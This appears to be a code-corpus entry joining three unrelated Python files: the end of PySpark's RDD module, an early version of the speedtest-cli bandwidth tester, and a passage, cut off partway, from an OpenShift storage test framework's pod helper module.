debug_string = self._jrdd.toDebugString()
if debug_string:
return debug_string.encode('utf-8')
def getStorageLevel(self):
"""
Get the RDD's current storage level.
>>> rdd1 = sc.parallelize([1,2])
>>> rdd1.getStorageLevel()
StorageLevel(False, False, False, False, 1)
>>> print(rdd1.getStorageLevel())
Serialized 1x Replicated
"""
java_storage_level = self._jrdd.getStorageLevel()
storage_level = StorageLevel(java_storage_level.useDisk(),
java_storage_level.useMemory(),
java_storage_level.useOffHeap(),
java_storage_level.deserialized(),
java_storage_level.replication())
return storage_level
def _defaultReducePartitions(self):
"""
Returns the default number of partitions to use during reduce tasks (e.g., groupBy).
If spark.default.parallelism is set, then we'll use the value from SparkContext
defaultParallelism, otherwise we'll use the number of partitions in this RDD.
This mirrors the behavior of the Scala Partitioner#defaultPartitioner, intended to reduce
the likelihood of OOMs. Once PySpark adopts Partitioner-based APIs, this behavior will
be inherent.
"""
if self.ctx._conf.contains("spark.default.parallelism"):
return self.ctx.defaultParallelism
else:
return self.getNumPartitions()
def lookup(self, key):
"""
Return the list of values in the RDD for key `key`. This operation
is done efficiently if the RDD has a known partitioner by only
searching the partition that the key maps to.
>>> l = range(1000)
>>> rdd = sc.parallelize(zip(l, l), 10)
>>> rdd.lookup(42) # slow
[42]
>>> sorted = rdd.sortByKey()
>>> sorted.lookup(42) # fast
[42]
>>> sorted.lookup(1024)
[]
>>> rdd2 = sc.parallelize([(('a', 'b'), 'c')]).groupByKey()
>>> list(rdd2.lookup(('a', 'b'))[0])
['c']
"""
values = self.filter(lambda kv: kv[0] == key).values()
if self.partitioner is not None:
return self.ctx.runJob(values, lambda x: x, [self.partitioner(key)])
return values.collect()
def _to_java_object_rdd(self):
""" Return a JavaRDD of Object by unpickling
It will convert each Python object into Java object by Pyrolite, whenever the
RDD is serialized in batch or not.
"""
rdd = self._pickled()
return self.ctx._jvm.SerDeUtil.pythonToJava(rdd._jrdd, True)
def countApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate version of count() that returns a potentially incomplete
result within a timeout, even if not all tasks have finished.
>>> rdd = sc.parallelize(range(1000), 10)
>>> rdd.countApprox(1000, 1.0)
1000
"""
drdd = self.mapPartitions(lambda it: [float(sum(1 for i in it))])
return int(drdd.sumApprox(timeout, confidence))
def sumApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the sum within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000))
>>> abs(rdd.sumApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.mapPartitions(lambda it: [float(sum(it))])._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.sumApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def meanApprox(self, timeout, confidence=0.95):
"""
.. note:: Experimental
Approximate operation to return the mean within a timeout
or meet the confidence.
>>> rdd = sc.parallelize(range(1000), 10)
>>> r = sum(range(1000)) / 1000.0
>>> abs(rdd.meanApprox(1000) - r) / r < 0.05
True
"""
jrdd = self.map(float)._to_java_object_rdd()
jdrdd = self.ctx._jvm.JavaDoubleRDD.fromRDD(jrdd.rdd())
r = jdrdd.meanApprox(timeout, confidence).getFinalValue()
return BoundedFloat(r.mean(), r.confidence(), r.low(), r.high())
def countApproxDistinct(self, relativeSD=0.05):
"""
.. note:: Experimental
Return approximate number of distinct elements in the RDD.
The algorithm used is based on streamlib's implementation of
`"HyperLogLog in Practice: Algorithmic Engineering of a State
of The Art Cardinality Estimation Algorithm", available here
<http://dx.doi.org/10.1145/2452376.2452456>`_.
:param relativeSD: Relative accuracy. Smaller values create
counters that require more space.
It must be greater than 0.000017.
>>> n = sc.parallelize(range(1000)).map(str).countApproxDistinct()
>>> 900 < n < 1100
True
>>> n = sc.parallelize([i % 20 for i in range(1000)]).countApproxDistinct()
>>> 16 < n < 24
True
"""
if relativeSD < 0.000017:
raise ValueError("relativeSD should be greater than 0.000017")
# the hash space in Java is 2^32
hashRDD = self.map(lambda x: portable_hash(x) & 0xFFFFFFFF)
return hashRDD._to_java_object_rdd().countApproxDistinct(relativeSD)
def toLocalIterator(self):
"""
Return an iterator that contains all of the elements in this RDD.
The iterator will consume as much memory as the largest partition in this RDD.
>>> rdd = sc.parallelize(range(10))
>>> [x for x in rdd.toLocalIterator()]
[0, 1, 2, 3, 4, 5, 6, 7, 8, 9]
"""
with SCCallSiteSync(self.context) as css:
sock_info = self.ctx._jvm.PythonRDD.toLocalIteratorAndServe(self._jrdd.rdd())
return _load_from_socket(sock_info, self._jrdd_deserializer)
def _prepare_for_python_RDD(sc, command):
# the serialized command will be compressed by broadcast
ser = CloudPickleSerializer()
pickled_command = ser.dumps(command)
if len(pickled_command) > (1 << 20): # 1M
# The broadcast will have same life cycle as created PythonRDD
broadcast = sc.broadcast(pickled_command)
pickled_command = ser.dumps(broadcast)
broadcast_vars = [x._jbroadcast for x in sc._pickled_broadcast_vars]
sc._pickled_broadcast_vars.clear()
return pickled_command, broadcast_vars, sc.environment, sc._python_includes
def _wrap_function(sc, func, deserializer, serializer, profiler=None):
assert deserializer, "deserializer should not be empty"
assert serializer, "serializer should not be empty"
command = (func, profiler, deserializer, serializer)
pickled_command, broadcast_vars, env, includes = _prepare_for_python_RDD(sc, command)
return sc._jvm.PythonFunction(bytearray(pickled_command), env, includes, sc.pythonExec,
sc.pythonVer, broadcast_vars, sc._javaAccumulator)
class PipelinedRDD(RDD):
"""
Pipelined maps:
>>> rdd = sc.parallelize([1, 2, 3, 4])
>>> rdd.map(lambda x: 2 * x).cache().map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
>>> rdd.map(lambda x: 2 * x).map(lambda x: 2 * x).collect()
[4, 8, 12, 16]
Pipelined reduces:
>>> from operator import add
>>> rdd.map(lambda x: 2 * x).reduce(add)
20
>>> rdd.flatMap(lambda x: [x, x]).reduce(add)
20
"""
def __init__(self, prev, func, preservesPartitioning=False):
if not isinstance(prev, PipelinedRDD) or not prev._is_pipelinable():
# This transformation is the first in its stage:
self.func = func
self.preservesPartitioning = preservesPartitioning
self._prev_jrdd = prev._jrdd
self._prev_jrdd_deserializer = prev._jrdd_deserializer
else:
prev_func = prev.func
def pipeline_func(split, iterator):
return func(split, prev_func(split, iterator))
self.func = pipeline_func
self.preservesPartitioning = \
prev.preservesPartitioning and preservesPartitioning
self._prev_jrdd = prev._prev_jrdd # maintain the pipeline
self._prev_jrdd_deserializer = prev._prev_jrdd_deserializer
self.is_cached = False
self.is_checkpointed = False
self.ctx = prev.ctx
self.prev = prev
self._jrdd_val = None
self._id = None
self._jrdd_deserializer = self.ctx.serializer
self._bypass_serializer = False
self.partitioner = prev.partitioner if self.preservesPartitioning else None
def getNumPartitions(self):
return self._prev_jrdd.partitions().size()
@property
def _jrdd(self):
if self._jrdd_val:
return self._jrdd_val
if self._bypass_serializer:
self._jrdd_deserializer = NoOpSerializer()
if self.ctx.profiler_collector:
profiler = self.ctx.profiler_collector.new_profiler(self.ctx)
else:
profiler = None
wrapped_func = _wrap_function(self.ctx, self.func, self._prev_jrdd_deserializer,
self._jrdd_deserializer, profiler)
python_rdd = self.ctx._jvm.PythonRDD(self._prev_jrdd.rdd(), wrapped_func,
self.preservesPartitioning)
self._jrdd_val = python_rdd.asJavaRDD()
if profiler:
self._id = self._jrdd_val.id()
self.ctx.profiler_collector.add_profiler(self._id, profiler)
return self._jrdd_val
def id(self):
if self._id is None:
self._id = self._jrdd.id()
return self._id
def _is_pipelinable(self):
return not (self.is_cached or self.is_checkpointed)
def _test():
import doctest
from pyspark.context import SparkContext
globs = globals().copy()
# The small batch size here ensures that we see multiple batches,
# even in these small test examples:
globs['sc'] = SparkContext('local[4]', 'PythonTest')
(failure_count, test_count) = doctest.testmod(
globs=globs, optionflags=doctest.ELLIPSIS)
globs['sc'].stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
speedtest-cli.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright 2013 Matt Martz
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
__version__ = '0.2.1'
try:
from urllib2 import urlopen, Request
except ImportError:
from urllib.request import urlopen, Request
import math
import time
import os
import sys
import threading
import re
import signal
from xml.dom import minidom as DOM
try:
from Queue import Queue
except ImportError:
from queue import Queue
try:
from urlparse import urlparse
except ImportError:
from urllib.parse import urlparse
try:
from urlparse import parse_qs
except ImportError:
try:
from urllib.parse import parse_qs
except ImportError:
from cgi import parse_qs
try:
from hashlib import md5
except ImportError:
from md5 import md5
try:
from argparse import ArgumentParser as ArgParser
except ImportError:
from optparse import OptionParser as ArgParser
try:
import builtins
except ImportError:
def print_(*args, **kwargs):
"""The new-style print function taken from
https://pypi.python.org/pypi/six/
"""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
else:
print_ = getattr(builtins, 'print')
del builtins
def distance(origin, destination):
"""Determine distance between 2 sets of [lat,lon] in km"""
lat1, lon1 = origin
lat2, lon2 = destination
radius = 6371 # km
dlat = math.radians(lat2-lat1)
dlon = math.radians(lon2-lon1)
a = (math.sin(dlat / 2) * math.sin(dlat / 2) + math.cos(math.radians(lat1))
* math.cos(math.radians(lat2)) * math.sin(dlon / 2)
* math.sin(dlon / 2))
c = 2 * math.atan2(math.sqrt(a), math.sqrt(1 - a))
d = radius * c
return d
class FileGetter(threading.Thread):
def __init__(self, url, start):
self.url = url
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
self.result = [0]
try:
if (time.time() - self.starttime) <= 10:
f = urlopen(self.url)
while 1 and not shutdown_event.is_set():
self.result.append(len(f.read(10240)))
if self.result[-1] == 0:
break
f.close()
except IOError:
pass
def downloadSpeed(files, quiet=False):
start = time.time()
def producer(q, files):
for file in files:
thread = FileGetter(file, start)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.is_set():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_files):
while len(finished) < total_files:
thread = q.get(True)
while thread.is_alive():
thread.join(timeout=0.1)
finished.append(sum(thread.result))
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, files))
cons_thread = threading.Thread(target=consumer, args=(q, len(files)))
start = time.time()
prod_thread.start()
cons_thread.start()
while prod_thread.is_alive():
prod_thread.join(timeout=0.1)
while cons_thread.is_alive():
cons_thread.join(timeout=0.1)
return (sum(finished)/(time.time()-start))
class FilePutter(threading.Thread):
def __init__(self, url, start, size):
self.url = url
chars = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
data = chars * (int(round(int(size) / 36.0)))
self.data = ('content1=%s' % data[0:int(size)-9]).encode()
del data
self.result = None
self.starttime = start
threading.Thread.__init__(self)
def run(self):
try:
if ((time.time() - self.starttime) <= 10 and
not shutdown_event.is_set()):
f = urlopen(self.url, self.data)
f.read(11)
f.close()
self.result = len(self.data)
else:
self.result = 0
except IOError:
self.result = 0
def uploadSpeed(url, sizes, quiet=False):
start = time.time()
def producer(q, sizes):
for size in sizes:
thread = FilePutter(url, start, size)
thread.start()
q.put(thread, True)
if not quiet and not shutdown_event.is_set():
sys.stdout.write('.')
sys.stdout.flush()
finished = []
def consumer(q, total_sizes):
while len(finished) < total_sizes:
thread = q.get(True)
while thread.is_alive():
thread.join(timeout=0.1)
finished.append(thread.result)
del thread
q = Queue(6)
prod_thread = threading.Thread(target=producer, args=(q, sizes))
cons_thread = threading.Thread(target=consumer, args=(q, len(sizes)))
start = time.time()
prod_thread.start()
cons_thread.start()
while prod_thread.is_alive():
prod_thread.join(timeout=0.1)
while cons_thread.is_alive():
cons_thread.join(timeout=0.1)
return (sum(finished)/(time.time()-start))
def getAttributesByTagName(dom, tagName):
elem = dom.getElementsByTagName(tagName)[0]
return dict(list(elem.attributes.items()))
def getConfig():
"""Download the speedtest.net configuration and return only the data
we are interested in
"""
uh = urlopen('http://www.speedtest.net/speedtest-config.php')
configxml = uh.read()
if int(uh.code) != 200:
return None
uh.close()
root = DOM.parseString(configxml)
config = {
'client': getAttributesByTagName(root, 'client'),
'times': getAttributesByTagName(root, 'times'),
'download': getAttributesByTagName(root, 'download'),
'upload': getAttributesByTagName(root, 'upload')}
del root
return config
def closestServers(client, all=False):
"""Determine the 5 closest speedtest.net servers based on geographic
distance
"""
uh = urlopen('http://www.speedtest.net/speedtest-servers.php')
serversxml = uh.read()
if int(uh.code) != 200:
return None
uh.close()
root = DOM.parseString(serversxml)
servers = {}
for server in root.getElementsByTagName('server'):
attrib = dict(list(server.attributes.items()))
d = distance([float(client['lat']), float(client['lon'])],
[float(attrib.get('lat')), float(attrib.get('lon'))])
attrib['d'] = d
if d not in servers:
servers[d] = [attrib]
else:
servers[d].append(attrib)
del root
closest = []
for d in sorted(servers.keys()):
for s in servers[d]:
closest.append(s)
if len(closest) == 5 and not all:
break
else:
continue
break
del servers
return closest
def getBestServer(servers):
"""Perform a speedtest.net "ping" to determine which speedtest.net
server has the lowest latency
"""
results = {}
for server in servers:
cum = []
url = os.path.dirname(server['url'])
for i in range(0, 3):
uh = urlopen('%s/latency.txt' % url)
start = time.time()
text = uh.read(9)
total = time.time() - start
if int(uh.code) == 200 and text == 'test=test'.encode():
cum.append(total)
else:
cum.append(3600)
uh.close()
avg = round((sum(cum) / 3) * 1000000, 3)
results[avg] = server
fastest = sorted(results.keys())[0]
best = results[fastest]
best['latency'] = fastest
return best
def ctrl_c(signum, frame):
global shutdown_event
shutdown_event.set()
raise SystemExit('\nCancelling...')
def version():
raise SystemExit(__version__)
def speedtest():
"""Run the full speedtest.net test"""
global shutdown_event
shutdown_event = threading.Event()
signal.signal(signal.SIGINT, ctrl_c)
description = (
'Command line interface for testing internet bandwidth using '
'speedtest.net.\n'
'------------------------------------------------------------'
'--------------\n'
'https://github.com/sivel/speedtest-cli')
parser = ArgParser(description=description)
try:
parser.add_argument = parser.add_option
except AttributeError:
pass
parser.add_argument('--share', action='store_true',
help='Generate and provide a URL to the speedtest.net '
'share results image')
parser.add_argument('--simple', action='store_true',
help='Suppress verbose output, only show basic '
'information')
parser.add_argument('--list', action='store_true',
help='Display a list of speedtest.net servers '
'sorted by distance')
parser.add_argument('--server', help='Specify a server ID to test against')
parser.add_argument('--mini', help='URL of the Speedtest Mini server')
parser.add_argument('--version', action='store_true',
help='Show the version number and exit')
options = parser.parse_args()
if isinstance(options, tuple):
args = options[0]
else:
args = options
del options
if args.version:
version()
if not args.simple:
print_('Retrieving speedtest.net configuration...')
config = getConfig()
if not args.simple:
print_('Retrieving speedtest.net server list...')
if args.list or args.server:
servers = closestServers(config['client'], True)
if args.list:
serverList = []
for server in servers:
line = ('%(id)4s) %(sponsor)s (%(name)s, %(country)s) '
'[%(d)0.2f km]' % server)
serverList.append(line)
try:
print_('\n'.join(serverList).encode('utf-8', 'ignore'))
except IOError:
pass
sys.exit(0)
else:
servers = closestServers(config['client'])
if not args.simple:
print_('Testing from %(isp)s (%(ip)s)...' % config['client'])
if args.server:
try:
best = getBestServer(filter(lambda x: x['id'] == args.server,
servers))
except IndexError:
print_('Invalid server ID')
sys.exit(1)
elif args.mini:
name, ext = os.path.splitext(args.mini)
if ext:
url = os.path.dirname(args.mini)
else:
url = args.mini
urlparts = urlparse(url)
try:
f = urlopen(args.mini)
except:
print_('Invalid Speedtest Mini URL')
sys.exit(1)
else:
text = f.read()
f.close()
extension = re.findall('upload_extension: "([^"]+)"', text.decode())
if not urlparts or not extension:
print_('Please provide the full URL of your Speedtest Mini server')
sys.exit(1)
servers = [{
'sponsor': 'Speedtest Mini',
'name': urlparts[1],
'd': 0,
'url': '%s/speedtest/upload.%s' % (url.rstrip('/'), extension[0]),
'latency': 0,
'id': 0
}]
try:
best = getBestServer(servers)
except:
best = servers[0]
else:
if not args.simple:
print_('Selecting best server based on ping...')
best = getBestServer(servers)
if not args.simple:
print_('Hosted by %(sponsor)s (%(name)s) [%(d)0.2f km]: '
'%(latency)s ms' % best)
else:
print_('Ping: %(latency)s ms' % best)
sizes = [350, 500, 750, 1000, 1500, 2000, 2500, 3000, 3500, 4000]
urls = []
for size in sizes:
for i in range(0, 4):
urls.append('%s/random%sx%s.jpg' %
(os.path.dirname(best['url']), size, size))
if not args.simple:
print_('Testing download speed', end='')
dlspeed = downloadSpeed(urls, args.simple)
if not args.simple:
print_()
print_('Download: %0.2f Mbit/s' % ((dlspeed / 1000 / 1000) * 8))
sizesizes = [int(.25 * 1000 * 1000), int(.5 * 1000 * 1000)]
sizes = []
for size in sizesizes:
for i in range(0, 25):
sizes.append(size)
if not args.simple:
print_('Testing upload speed', end='')
ulspeed = uploadSpeed(best['url'], sizes, args.simple)
if not args.simple:
print_()
print_('Upload: %0.2f Mbit/s' % ((ulspeed / 1000 / 1000) * 8))
if args.share and args.mini:
print_('Cannot generate a speedtest.net share results image while '
'testing against a Speedtest Mini server')
elif args.share:
dlspeedk = int(round((dlspeed / 1000) * 8, 0))
ping = int(round(best['latency'], 0))
ulspeedk = int(round((ulspeed / 1000) * 8, 0))
apiData = [
'download=%s' % dlspeedk,
'ping=%s' % ping,
'upload=%s' % ulspeedk,
'promo=',
'startmode=%s' % 'pingselect',
'recommendedserverid=%s' % best['id'],
'accuracy=%s' % 1,
'serverid=%s' % best['id'],
'hash=%s' % md5(('%s-%s-%s-%s' %
(ping, ulspeedk, dlspeedk, '297aae72'))
.encode()).hexdigest()]
req = Request('http://www.speedtest.net/api/api.php',
data='&'.join(apiData).encode())
req.add_header('Referer', 'http://c.speedtest.net/flash/speedtest.swf')
f = urlopen(req)
response = f.read()
code = f.code
f.close()
if int(code) != 200:
print_('Could not submit results to speedtest.net')
sys.exit(1)
qsargs = parse_qs(response.decode())
resultid = qsargs.get('resultid')
if not resultid or len(resultid) != 1:
print_('Could not submit results to speedtest.net')
sys.exit(1)
print_('Share results: http://www.speedtest.net/result/%s.png' %
resultid[0])
def main():
try:
speedtest()
except KeyboardInterrupt:
print_('\nCancelling...')
if __name__ == '__main__':
main()
# vim:ts=4:sw=4:expandtab
|
pod.py | """
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS, get_job_obj
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
"""
Handles per pod related context
"""
def __init__(self, **kwargs):
"""
Initializer function
kwargs:
Copy of ocs/defaults.py::<some pod> dictionary
"""
self.pod_data = kwargs
# configure http[s]_proxy env variable, if applicable
update_container_with_proxy_env(self.pod_data)
super(Pod, self).__init__(**kwargs)
with tempfile.NamedTemporaryFile(
mode="w+", prefix="POD_", delete=False
) as temp_info:
self.temp_yaml = temp_info.name
self._name = self.pod_data.get("metadata").get("name")
self._labels = self.get_labels()
self._roles = []
self.ocp = OCP(
api_version=defaults.API_VERSION,
kind=constants.POD,
namespace=self.namespace,
)
self.fio_thread = None
# TODO: get backend config !!
self.wl_obj = None
self.wl_setup_done = False
@property
def name(self):
return self._name
@property
def namespace(self):
return self._namespace
@property
def roles(self):
return self._roles
@property
def labels(self):
return self._labels
@property
def restart_count(self):
return self.get().get("status").get("containerStatuses")[0].get("restartCount")
def __setattr__(self, key, val):
self.__dict__[key] = val
def add_role(self, role):
"""
Adds a new role for this pod
Args:
role (str): New role to be assigned for this pod
"""
self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
"""
Get FIO execution results
Returns:
dict: Dictionary represents the FIO execution results
Raises:
Exception: In case of exception from FIO
"""
logger.info(f"Waiting for FIO results from pod {self.name}")
try:
result = self.fio_thread.result(timeout)
if result:
return yaml.safe_load(result)
raise CommandFailed(f"FIO execution results: {result}.")
except CommandFailed as ex:
logger.exception(f"FIO failed: {ex}")
raise
except Exception as ex:
logger.exception(f"Found Exception: {ex}")
raise
def exec_cmd_on_pod(
self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
"""
Execute a command on a pod (e.g. oc rsh)
Args:
command (str): The command to execute on the given pod
out_yaml_format (bool): whether to return yaml loaded python
object OR to return raw output
secrets (list): A list of secrets to be masked with asterisks
This kwarg is popped in order to not interfere with
subprocess.run(``**kwargs``)
timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds
Returns:
Munch Obj: This object represents a returned yaml file
"""
rsh_cmd = f"rsh {self.name} "
rsh_cmd += command
return self.ocp.exec_oc_cmd(
rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
)
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
"""
Execute an S3 command on a pod
Args:
mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials
command (str): The command to execute on the given pod
Returns:
Munch Obj: This object represents a returned yaml file
"""
return self.exec_cmd_on_pod(
craft_s3_command(command, mcg_obj),
out_yaml_format=False,
secrets=[mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
if mcg_obj
else None,
)
def exec_sh_cmd_on_pod(self, command, sh="bash"):
"""
Execute a pure bash command on a pod via oc exec where you can use
bash syntaxt like &&, ||, ;, for loop and so on.
Args:
command (str): The command to execute on the given pod
Returns:
str: stdout of the command
"""
cmd = f'exec {self.name} -- {sh} -c "{command}"'
return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
"""
Get labels from pod
Raises:
NotFoundError: If resource not found
Returns:
dict: All the openshift labels on a given pod
"""
return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
"""
Execute a Ceph command on the Ceph tools pod
Args:
ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
format (str): The returning output format of the Ceph command
Returns:
dict: Ceph command output
Raises:
CommandFailed: In case the pod is not a toolbox pod
"""
if "rook-ceph-tools" not in self.labels.values():
raise CommandFailed("Ceph commands can be executed only on toolbox pod")
ceph_cmd = ceph_cmd
if format:
ceph_cmd += f" --format {format}"
out = self.exec_cmd_on_pod(ceph_cmd)
# For some commands, like "ceph fs ls", the returned output is a list
if isinstance(out, list):
return [item for item in out if item]
return out
def get_storage_path(self, storage_type="fs"):
"""
Get the pod volume mount path or device path
Returns:
str: The mount path of the volume on the pod (e.g. /var/lib/www/html/) if storage_type is fs
else device path of raw block pv
"""
# TODO: Allow returning a path of a specified volume of a specified
# container
if storage_type == "block":
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeDevices")[0]
.get("devicePath")
)
return (
self.pod_data.get("spec")
.get("containers")[0]
.get("volumeMounts")[0]
.get("mountPath")
)
def workload_setup(self, storage_type, jobs=1):
"""
Do setup on pod for running FIO
Args:
storage_type (str): 'fs' or 'block'
jobs (int): Number of jobs to execute FIO
"""
work_load = "fio"
name = f"test_workload_{work_load}"
path = self.get_storage_path(storage_type)
# few io parameters for Fio
self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
self.wl_setup_done = True
def run_io(
self,
storage_type,
size,
io_direction="rw",
rw_ratio=75,
jobs=1,
runtime=60,
depth=4,
rate="1m",
rate_process="poisson",
fio_filename=None,
bs="4K",
end_fsync=0,
):
"""
Execute FIO on a pod
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
storage_type (str): 'fs' or 'block'
size (str): Size in MB, e.g. '200M'
io_direction (str): Determines the operation:
'ro', 'wo', 'rw' (default: 'rw')
rw_ratio (int): Determines the reads and writes using a
<rw_ratio>%/100-<rw_ratio>%
(e.g. the default is 75 which means it is 75%/25% which
equivalent to 3 reads are performed for every 1 write)
jobs (int): Number of jobs to execute FIO
runtime (int): Number of seconds IO should run for
depth (int): IO depth
rate (str): rate of IO default 1m, e.g. 16k
rate_process (str): kind of rate process default poisson, e.g. poisson
fio_filename(str): Name of fio file created on app pod's mount point
bs (str): Block size, e.g. 4K
end_fsync (int): If 1, fio will sync file contents when a write
stage has completed. Fio default is 0
"""
if not self.wl_setup_done:
self.workload_setup(storage_type=storage_type, jobs=jobs)
if io_direction == "rw":
self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
self.io_params["rwmixread"] = rw_ratio
else:
self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
self.io_params["runtime"] = runtime
size = size if isinstance(size, str) else f"{size}G"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.io_params["iodepth"] = depth
self.io_params["rate"] = rate
self.io_params["rate_process"] = rate_process
self.io_params["bs"] = bs
if end_fsync:
self.io_params["end_fsync"] = end_fsync
self.fio_thread = self.wl_obj.run(**self.io_params)
def fillup_fs(self, size, fio_filename=None):
"""
Execute FIO on a pod to fillup a file
This will run sequantial IO of 1MB block size to fill up the fill with data
This operation will run in background and will store the results in
'self.thread.result()'.
In order to wait for the output and not continue with the test until
FIO is done, call self.thread.result() right after calling run_io.
See tests/manage/test_pvc_deletion_during_io.py::test_run_io
for usage of FIO
Args:
size (str): Size in MB, e.g. '200M'
fio_filename(str): Name of fio file created on app pod's mount point
"""
if not self.wl_setup_done:
self.workload_setup(storage_type="fs", jobs=1)
self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
size = size if isinstance(size, str) else f"{size}M"
self.io_params["size"] = size
if fio_filename:
self.io_params["filename"] = fio_filename
self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self):
"""
Execute git clone on a pod to simulate a Jenkins user
"""
name = "test_workload"
work_load = "jenkins"
wl = workload.WorkLoad(
name=name, work_load=work_load, pod=self, path=self.get_storage_path()
)
assert wl.setup(), "Setup up for git failed"
wl.run()
def install_packages(self, packages):
"""
Install packages in a Pod
Args:
packages (list): List of packages to install
"""
if isinstance(packages, list):
packages = " ".join(packages)
cmd = f"yum install {packages} -y"
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
"""
Upload a file from pod to server
Args:
server (str): Name of the server to upload
authkey (str): Authentication file (.pem file)
localpath (str): Local file/dir in pod to upload
remotepath (str): Target path on the remote server
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = (
f'scp -i {authkey} -o "StrictHostKeyChecking no"'
f" -r {localpath} {user}@{server}:{remotepath}"
)
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
"""
Run command on a remote server from pod
Args:
server (str): Name of the server to run the command
authkey (str): Authentication file (.pem file)
cmd (str): command to run on server from pod
user (str): User name to connect to server
"""
if not user:
user = "root"
cmd = f'ssh -i {authkey} -o "StrictHostKeyChecking no" {user}@{server} {cmd}'
self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def get_memory(self):
"""
Get the pod memory size
Returns:
dict: The names of the pod's containers (str) as keys and their memory
size (str) as values
"""
containers = self.pod_data.get("spec").get("containers")
container_names_and_memory = {
container.get("name"): container.get("resources")
.get("limits")
.get("memory")
for container in containers
}
return container_names_and_memory
def get_node(self):
"""
Gets the node name
Returns:
str: Node name
"""
if config.ENV_DATA.get("platform", "").lower() == "aws":
